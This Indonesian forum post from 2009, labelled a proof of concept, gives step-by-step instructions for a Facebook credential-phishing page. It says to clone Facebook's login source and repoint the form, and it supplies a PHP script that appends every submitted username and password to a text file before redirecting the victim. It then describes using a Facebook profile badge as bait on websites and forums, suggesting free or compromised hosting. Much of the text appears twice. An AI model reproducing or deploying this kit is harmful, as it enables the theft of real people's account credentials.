[POC] simple idea fakelogin facebook
Posted: Fri Aug 28, 2009 2:51 am
dibutuhkan sedikit kesabaran untuk mencari hasil "tangkapan" dari kail yang kita pasang... 
recruitment:
kita gunakan "badge" facebook
kemudian edit/setting sebagus mungkin badge anda, kemudian kita buat untuk umpan
ok langsung saja...
1. kita buat fake login-nya
- logout facebook anda terlebih dahulu
- buka halaman depan facebook
- view source
- copy source
- paste source di editor (saya menggunakan editplus)
- cari "method",
- method="post" ganti dengan method="get"
- cari "action"
- action="URLasli" ganti dengan action="log.php"
- simpan dalam bentuk html ex: index.html
2. buat file log.php
isinya:
ganti header("Location: "); dengan header("Location:http://xxx.com");
dimana maksud dari code tersebut yaitu ketika target meng-klik "Login/Masuk" maka dia akan redirect ke url tersebut
ganti juga password.txt dengan nama terserah
simpan file log.php
2. buka facebook anda dan login
3. masuk ke url ini http://www.facebook.com/facebook-widget ... badges.php
4. atur secantik mungkin
FINISH?!?!?
5. ambil code-nya
misal :
nah url http://www.facebook.com/xshadow diganti dengan url fake login anda 
moga2 aja target gak tau :p
6. pasang code diatas di web anda... di forum anda... tapi ingat... ABC (Arena Bocah CukDu$), gak tanggung jawab
recruitment:
Concept...- text editor (notepad, wordpad, editplus, geany, notepad++, dll)
- ketelitian
- kesabaran
- hosting gratisan atau hasil inject
kita gunakan "badge" facebook
kemudian edit/setting sebagus mungkin badge anda, kemudian kita buat untuk umpan
ok langsung saja...
1. kita buat fake login-nya
- logout facebook anda terlebih dahulu
- buka halaman depan facebook
- view source
- copy source
- paste source di editor (saya menggunakan editplus)
- cari "method",
- method="post" ganti dengan method="get"
- cari "action"
- action="URLasli" ganti dengan action="log.php"
- simpan dalam bentuk html ex: index.html
2. buat file log.php
isinya:
Code: Select all
<?php
header("Location: ");
$handle =
fopen("passwords.txt", "a");
foreach($_GET as
$variable => $value) {
fwrite($handle,
$variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle,
"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>dimana maksud dari code tersebut yaitu ketika target meng-klik "Login/Masuk" maka dia akan redirect ke url tersebut
ganti juga password.txt dengan nama terserah
simpan file log.php
2. buka facebook anda dan login
3. masuk ke url ini http://www.facebook.com/facebook-widget ... badges.php
4. atur secantik mungkin
FINISH?!?!?5. ambil code-nya
misal :
Code: Select all
<!-- Facebook Badge START -->
<a href="http://www.facebook.com/xshadow" title="Satya Permana Putra" target="_TOP"
style="font-family: "lucida grande",tahoma,verdana,arial,sans-serif;
font-size: 11px; font-variant: normal; font-style: normal; font-weight: normal;
color: #3B5998; text-decoration: none;">
<img src="http://www.facebook.com/badge.php?id=1263018894&bid=210&key=1299911766&format=png&z=1070161121"
alt="http://www.facebook.com/badge.php?id=1263018894&bid=210&key=1299911766&format=png&z=1070161121"/></a>
<!-- Facebook Badge END -->
6. pasang code diatas di web anda... di forum anda... tapi ingat... ABC (Arena Bocah CukDu$), gak tanggung jawab
